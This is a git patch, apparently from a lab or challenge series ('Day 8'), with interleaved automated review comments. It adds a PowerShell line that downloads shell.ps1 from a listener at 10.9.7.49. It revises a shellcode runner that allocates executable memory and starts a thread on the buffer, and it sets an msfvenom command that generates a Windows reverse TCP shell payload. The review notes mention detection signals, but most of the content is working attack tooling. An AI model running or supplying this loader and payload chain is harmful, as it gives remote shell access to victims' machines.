From 2fbdc476ce6ee74d595436c47d17db5d3385701e Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Sivert=20V=2E=20S=C3=A6ther?=
Date: Wed, 11 Dec 2024 22:05:18 +0100
Subject: [PATCH] Day 8 updates
---
 8/download.ps1 | 1 +
 8/shell.ps1 | 21 ++++++---------------
 8/venom.sh | 2 +-
 3 files changed, 8 insertions(+), 16 deletions(-)
 create mode 100644 8/download.ps1
diff --git a/8/download.ps1 b/8/download.ps1
new file mode 100644
index 0000000..0d820bb
--- /dev/null
+++ b/8/download.ps1
@@ -0,0 +1 @@
+(New-Object System.Net.WebClient).DownloadData('http://10.9.7.49:8000/shell.ps1')
diff --git a/8/shell.ps1 b/8/shell.ps1
index ce83413..ae2ea65 100644
--- a/8/shell.ps1
+++ b/8/shell.ps1
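Review bot: The added line in 8/download.ps1 hard-codes `http://10.9.7.49:8000/shell.ps1`, and the 8/venom.sh hunk in this commit replaces `LHOST="$1"` with the same literal address, so the value now lives in two files with no comment saying which host it is. The fetch uses plain HTTP and nothing checks the returned bytes, so whatever answers on that port is accepted unverified. The file has no header either; a one-line comment such as `# Fetches shell.ps1 from the lab listener over HTTP; address must match 8/venom.sh` would document the coupling ("lab listener" is inferred from the private-range address). For readers using this as a detection sample, this `System.Net.WebClient` call is the kind of line that PowerShell script block logging (event ID 4104) records verbatim.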
@@ -1,40 +1,31 @@
-$Buf =
+[Byte[]] $buf =
 $VrtAlloc = @"
 using System;
 using System.Runtime.InteropServices;
-
 public class VrtAlloc{
 [DllImport("kernel32")]
- public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+ public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
 }
 "@
-
 Add-Type $VrtAlloc
-
 $WaitFor= @"
 using System;
 using System.Runtime.InteropServices;
-
 public class WaitFor{
 [DllImport("kernel32.dll", SetLastError=true)]
- public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
+ public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
 }
 "@
-
 Add-Type $WaitFor
-
 $CrtThread= @"
 using System;
 using System.Runtime.InteropServices;
-
 public class CrtThread{
- [DllImport("kernel32", CharSet=CharSet.Ansi)]
- public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
-
+[DllImport("kernel32", CharSet=CharSet.Ansi)]
+public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
 }
 "@
-Add-Type $CrtThread
-
+Add-Type $CrtThread
 [IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
 [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
 $thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
diff --git a/8/venom.sh b/8/venom.sh
index 655354e..1cfc910 100755
--- a/8/venom.sh
+++ b/8/venom.sh
@@ -1 +1 @@
-msfvenom -p windows/x64/shell_reverse_tcp LHOST="$1" LPORT=1337 -f powershell
+msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.7.49 LPORT=4444 -f powershell
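Review bot: The new `CrtThread` members (`+[DllImport("kernel32", CharSet=CharSet.Ansi)]` and the `+public static extern IntPtr CreateThread(...)` line) appear to sit at column 0 while the `VrtAlloc` and `WaitFor` members keep an indent, so the three here-strings are now formatted inconsistently; pick one indent for all three (whitespace on this page is collapsed, so confirm against the file). The script also carries no comments: the unchanged call `VirtualAlloc(0, $buf.Length, 0x3000, 0x40)` uses bare constants, and a comment such as `# 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE` would tell an analyst that the region is writable and executable at once. That allocation followed by `Marshal.Copy` and `CreateThread`, with the P/Invoke signatures compiled through `Add-Type`, is the sequence that memory-protection and script-logging controls key on, which is worth stating in a file header. The script may continue past the last context line of this hunk.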